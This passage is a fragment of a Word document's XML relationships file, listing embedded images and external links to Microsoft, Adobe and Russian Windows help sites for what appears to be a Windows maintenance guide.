Target="http://technet.microsoft.com/ru-ru/windows/bb264763.aspx" TargetMode="External"/><Relationship Id="rId424" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kompkimi.ru/?attachment_id=31134" TargetMode="External"/><Relationship Id="rId466" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image310.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.jpeg"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.teatrbaby.ru/master_zvuk/program" TargetMode="External"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image162.png"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image205.jpeg"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.jpeg"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.jpeg"/><Relationship Id="rId368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image243.png"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image114.jpeg"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image141.jpeg"/><Relationship Id="rId435" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image282.png"/><Relationship Id="rId477" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image321.png"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kompkimi.ru/?attachment_id=28084" TargetMode="External"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image215.jpeg"/><Relationship Id="rId502" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image346.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.jpeg"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://windows.microsoft.com/ru-ru/windows/delete-files-using-disk-cleanup" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.white-windows.ru/wp-content/uploads/2015/07/img_2081.jpg" TargetMode="External"/><Relationship Id="rId379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.intuit.ru/department/se/testing/9/testing_9.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://support.microsoft.com/" TargetMode="External"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vistablog.com.ua/Windows/view_windows.php?id=419" TargetMode="External"/><Relationship Id="rId390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image253.png"/><Relationship Id="rId404" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image261.jpeg"/><Relationship Id="rId446" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image290.jpeg"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vistablog.com.ua/Windows/view_windows.php?id=263" TargetMode="External"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image172.jpeg"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image185.jpeg"/><Relationship Id="rId488" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image332.jpeg"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.jpeg"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.gif"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.gif"/><Relationship Id="rId348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image226.jpeg"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.jpeg"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://wininfo.org.ua/uploads/posts/2011-11/1320530401_upr9.jp" TargetMode="External"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image124.jpeg"/><Relationship Id="rId415" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image271.jpeg"/><Relationship Id="rId457" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image301.png"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vistablog.com.ua/Windows/view_windows.php?id=101" TargetMode="External"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://go.microsoft.com/fwlink/?LinkId=77613" TargetMode="External"/><Relationship Id="rId478" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image322.png"/><Relationship Id="rId499" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image343.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://windowshelp.microsoft.com/Windows/ru-RU/Help/82c0440d-553e-47e9-b4bd-6c2d10df4de71033.mspx" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.jpeg"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.jpeg"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://helpx.adobe.com/ru/x-productkb/global/delete-temporary-files-using-disk.html" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.gif"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image168.png"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image196.jpeg"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image216.jpeg"/><Relationship Id="rId359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image234.png"/><Relationship Id="rId503" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image347.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.gif"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.gif"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.jpeg"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.jpeg"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="javascript:void(0);" TargetMode="External"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kompkimi.ru/wp-content/uploads/2015/06/Oblast-prosmotra.png" TargetMode="External"/><Relationship Id="rId370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image245.png"/><Relationship Id="rId391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/se/testing/9/9_4.gif" TargetMode="External"/><Relationship Id="rId405" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://remontcompa.ru/uploads/posts/2015-09/1443118595_115.jpg" TargetMode="External"/><Relationship Id="rId426" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kompkimi.ru/?attachment_id=31135" TargetMode="External"/><Relationship Id="rId447" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image291.png"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image143.jpeg"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image150.jpeg"/><Relationship Id="rId468" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image312.png"/><Relationship Id="rId489" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image333.jpeg"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.jpeg"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.jpeg"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.jpeg"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image163.png"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kompkimi.ru/?attachment_id=28147" TargetMode="External"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image186.jpeg"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image207.jpeg"/><Relationship Id="rId349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/kb/3095113" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.gif"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.gif"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.jpeg"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.white-windows.ru/wp-content/uploads/2015/07/img_2088.jpg" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image116.jpeg"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://wininfo.org.ua/uploads/posts/2011-11/1320530420_upr10.jp" TargetMode="External"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image125.png"/><Relationship Id="rId360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image235.png"/><Relationship Id="rId381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.intuit.ru/department/se/testing/9/testing_9.html" TargetMode="External"/><Relationship Id="rId416" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image272.jpeg"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image134.png"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vistablog.com.ua/Windows/view_windows.php?id=108" TargetMode="External"/><Relationship Id="rId437" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image283.png"/><Relationship Id="rId458" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image302.png"/><Relationship Id="rId479" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image323.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://go.microsoft.com/fwlink/?LinkId=125112" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.jpeg"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://go.microsoft.com/fwlink/?LinkID=77614" TargetMode="External"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kompkimi.ru/?p=906" TargetMode="External"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image197.jpeg"/><Relationship Id="rId339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image217.jpeg"/><Relationship Id="rId490" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image334.jpeg"/><Relationship Id="rId504" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image348.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://windows.microsoft.com/ru-ru/windows/change-virtual-memory-size" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.gif"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.gif"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.gif"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.white-windows.ru/wp-content/uploads/2015/07/img_2083.jpg" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.jpeg"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="javascript:void(0);" TargetMode="External"/><Relationship Id="rId350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/ru-ru/library/mt627896.aspx" TargetMode="External"/><Relationship Id="rId371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image246.jpeg"/><Relationship Id="rId406" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image262.jpeg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image126.png"/><Relationship Id="rId392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.intuit.ru/department/se/testing/9/testing_9.html" TargetMode="External"/><Relationship Id="rId427" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image278.png"/><Relationship Id="rId448" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image292.png"/><Relationship Id="rId469" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image313.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.jpeg"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image144.jpeg"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image151.jpeg"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kompkimi.ru/?attachment_id=28079" TargetMode="External"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image173.jpeg"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image187.jpeg"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image208.jpeg"/><Relationship Id="rId480" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image324.jpeg"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.jpeg"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://windows.microsoft.com/ru-ru/windows/create-user-account" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.gif"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.gif"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.white-windows.ru/wp-content/uploads/2015/07/img_2077.jpg" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.jpeg"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image117.jpeg"/><Relationship Id="rId340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image218.jpeg"/><Relationship Id="rId361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image236.png"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://wininfo.org.ua/uploads/posts/2011-11/1320530422_upr11.jp" TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://wininfo.org.ua/uploads/posts/2011-11/1320530405_upr14.jp" TargetMode="External"/><Relationship Id="rId382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image250.png"/><Relationship Id="rId417" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image273.jpeg"/><Relationship Id="rId438" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kompkimi.ru/?attachment_id=31143" TargetMode="External"/><Relationship Id="rId459" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image303.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://go.microsoft.com/fwlink/?LinkId=131349" TargetMode="External"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kompkimi.ru/wp-content/uploads/2015/06/maxresdefault-1.jpg" TargetMode="External"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vistablog.com.ua/Windows/view_windows.php?id=419" TargetMode="External"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image155.gif"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kompkimi.ru/?attachment_id=28142" TargetMode="External"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image198.jpeg"/><Relationship Id="rId470" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image314.png"/><Relationship Id="rId491" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image335.jpeg"/><Relationship Id="rId505" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image349.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.jpeg"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://windows.microsoft.com/ru-ru/windows/change-virtual-memory-size" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.gif"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.gif"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.jpeg"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image209.jpeg"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.gif"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.jpeg"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.windowsupdate.com" TargetMode="External"/><Relationship Id="rId351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/ru-ru/library/mt629384.aspx" TargetMode="External"/><Relationship Id="rId372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image247.png"/><Relationship Id="rId393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.intuit.ru/department/se/testing/9/testing_9.html" TargetMode="External"/><Relationship Id="rId407" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image263.jpeg"/><Relationship Id="rId428" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kompkimi.ru/?attachment_id=31137" TargetMode="External"/><Relationship Id="rId449" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image293.png"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image127.jpeg"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image145.jpeg"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image152.gif"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image164.png"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image174.jpeg"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image188.jpeg"/><Relationship Id="rId460" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image304.png"/><Relationship Id="rId481" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image325.jpeg"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.jpeg"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.jpeg"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://windows.microsoft.com/ru-ru/windows/turn-user-account-control-on-off" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.gif"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.jpeg"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image199.jpeg"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://windows.microsoft.com/ru-ru/windows-8/improve-performance-optimizing-hard-drive" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.white-windows.ru/wp-content/uploads/2015/07/img_2089.jpg" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="javascript:void(0);" TargetMode="External"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image119.jpeg"/><Relationship Id="rId341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image219.jpeg"/><Relationship Id="rId362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image237.png"/><Relationship Id="rId383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/se/testing/9/9_1.gif" TargetMode="External"/><Relationship Id="rId418" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://winitpro.ru/wp-content/uploads/2010/07/image0021.jpg" TargetMode="External"/><Relationship Id="rId439" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image284.png"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://wininfo.org.ua/uploads/posts/2011-11/1320530308_upr15.jp" TargetMode="External"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image135.jpeg"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vistablog.com.ua/Windows/view_windows.php?id=420" TargetMode="External"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image156.png"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image169.jpeg"/><Relationship Id="rId450" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image294.png"/><Relationship Id="rId471" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image315.jpeg"/><Relationship Id="rId506" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image350.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://go.microsoft.com/fwlink/?linkid=133030" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.jpeg"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://helpx.adobe.com/ru/contact.html" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.gif"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.gif"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image189.jpeg"/><Relationship Id="rId492" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image336.jpeg"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://windows.microsoft.com/ru-ru/windows-8/get-best-display-monitor" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.gif"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.white-windows.ru/wp-content/uploads/2015/07/img_2084.jpg" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.jpeg"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="javascript:void(0);" TargetMode="External"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image210.jpeg"/><Relationship Id="rId352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image227.png"/><Relationship Id="rId373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image248.png"/><Relationship Id="rId394" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.intuit.ru/department/se/testing/9/testing_9.html" TargetMode="External"/><Relationship Id="rId408" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image264.jpeg"/><Relationship Id="rId429" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image279.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image128.jpeg"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image146.png"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image153.gif"/><Relationship Id="rId440" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kompkimi.ru/?attachment_id=31144" TargetMode="External"/><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image" Target="media/image74.gif"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kompkimi.ru/?attachment_id=28082" TargetMode="External"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image175.jpeg"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image179.jpeg"/><Relationship Id="rId461" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image305.png"/><Relationship Id="rId482" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image326.jpeg"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 